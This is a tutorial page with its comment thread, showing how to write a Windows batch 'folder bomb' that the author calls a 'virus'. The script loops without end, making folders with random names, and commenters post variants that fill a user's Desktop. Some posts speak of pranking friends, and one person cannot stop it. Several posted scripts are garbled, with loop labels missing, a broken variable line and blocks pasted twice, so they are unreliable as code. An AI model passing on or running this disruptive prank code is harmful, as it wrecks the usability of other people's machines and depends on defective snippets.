Folder Bomb Batch File


Intro: Folder Bomb Batch File

This is probably the most simple and productive batch "virus" there is.
It makes infinite folders named different numbers.

STEP 1: Open Notepad

To open note pad goto start menu ,and type note then look for note pad. Notepad is a free program that comes on any windows computer it is a lot more powerful than most people think.

STEP 2: Coding

Now here is where i say I'm not responsible for anything you do with this... This is for educational purposes only. Now this code is extremely easy. The code is:
@echo off
Md %random%
Goto 1

STEP 3: Final

That was over 2,000 files created. That is what it does.


Is there a way to create text files instead of folders?

Is there any way to create a Batch file that spams random letters instead of numbers?

Thanks in advance!

Is it possible to stop it? I didn't run the file, but my friend was enough of a dumbass to do it.

It's clever, but I have the following code to "control" it:

@echo off


md C:\BOMBER\%random%

goto top

so does this stop it all together.

or not?

All this does is put the created folders in another folder

i made this file and deleted it and now it wont stop making files!!! any help on how to stop??

is there a way to make the folders go directly on the desktop instead of in a folder on the desktop

yes; here is the code,

credit to mancaveroomcontrol, this is a modified ver.

@echo off

set limit=2000

set var1=0


set /a var1=%var1%+1

set /a (username here)=%user%

md c:\users\%user%\Desktop\%var1%

echo CREATED : FOLDER (Spam\%var1%)

if %limit% equ 0 (

goto CreateFolders


if %var1% equ %limit% goto End

goto CreateFolders



title Limit Reached!

echo Limit Reached!



goto End

Is there a way to make it so that it finds the active users name and automatically goes to it? Also I simplified your a little bit here:

@echo off

set limit=2000

set var1=0


set /a var1=%var1%+1

md c:\users\***USERNAMEHERE***\Desktop\%var1%

echo CREATED : FOLDER (c:\users\***USERNAMEHERE***\Desktop\%var1%)

if %limit% equ 0 (

goto CreateFolders


if %var1% equ %limit% goto End

goto CreateFolders



title Limit Reached!

echo Limit Reached!



goto End@echo off

set limit=2000

set var1=0


set /a var1=%var1%+1

md Spam\%var1%

echo CREATED : FOLDER (Spam\%var1%)

if %limit% equ 0 (

goto CreateFolders


if %var1% equ %limit% goto End

goto CreateFolders



title Limit Reached!

echo Limit Reached!



goto End

@echo off

set limit=2000

set var1=0


set /a var1=%var1%+1

md Spam\%var1%

echo CREATED : FOLDER (Spam\%var1%)

if %limit% equ 0 (

goto CreateFolders


if %var1% equ %limit% goto End

goto CreateFolders



title Limit Reached!

echo Limit Reached!



goto End

Where it says "limit=2000" you can change that to however many files you wish for this to create! If you want it to run continuously set it to 0

@echo off

set var1=0

md %userprofile%\Desktop\TestFile


set /a var1=%var1%+1

md %userprofile%\Desktop\TestFile\%var1%

goto :loop

Yes, first delete the batch file then delete the files themselves

Very clever. Is there a quick way to remove this, or reverse the effects?